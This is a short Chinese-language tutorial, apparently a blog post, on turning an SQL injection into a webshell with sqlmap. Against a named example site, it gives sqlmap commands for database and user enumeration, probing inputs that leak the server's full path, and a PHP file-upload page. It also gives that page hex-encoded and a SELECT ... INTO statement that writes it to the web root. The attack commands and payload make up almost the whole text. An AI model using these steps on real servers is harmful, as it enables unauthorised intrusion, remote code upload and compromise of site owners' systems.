sqlmap交互式写shell
1.首先是个注入点
./sqlmap.py -u https://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --dbs
2.查看当前用户,就是查看是不是root帐号(有没有权限)
./sqlmap.py -u https://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --current-user
3.想办法得到网站绝对路径(指定位置写shell)
https://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep 会看到 SQL注入
https://www.sitio-web.com/parametro-vulnerable?txt_palabra=[]isep 我们看到了一个完整的路径泄露
https://www.sitio-web.com/parametro-vulnerable?txt_palabra=huey 我们看到了一个完整的路径泄露
https://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep! 会看到一个完整的路径信息披露
https://www.sitio-web.com/parametro-vulnerable?txt_palabra='isep“ 我们将看到一个完整的路径信息披露
4.这里我们自己写段代码构造上传页面,代码如下
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>
5.我们通过sqlmap的--sql-shell执行sql语句写shell,我要对构造的代码进行HEX编码(十六进制)
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
6.好,我们开始主题。对sql语句进行构造进行写shell操作SELECT + 0x + 十六进制代码 + INTO + 完整路径 +上传文件名
select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into "/espejo/htdocs.v2/portalnuevo/buscadores/upload.php";
7.OK!我们上传成功,反问upload.php上传我们的webshell。
评论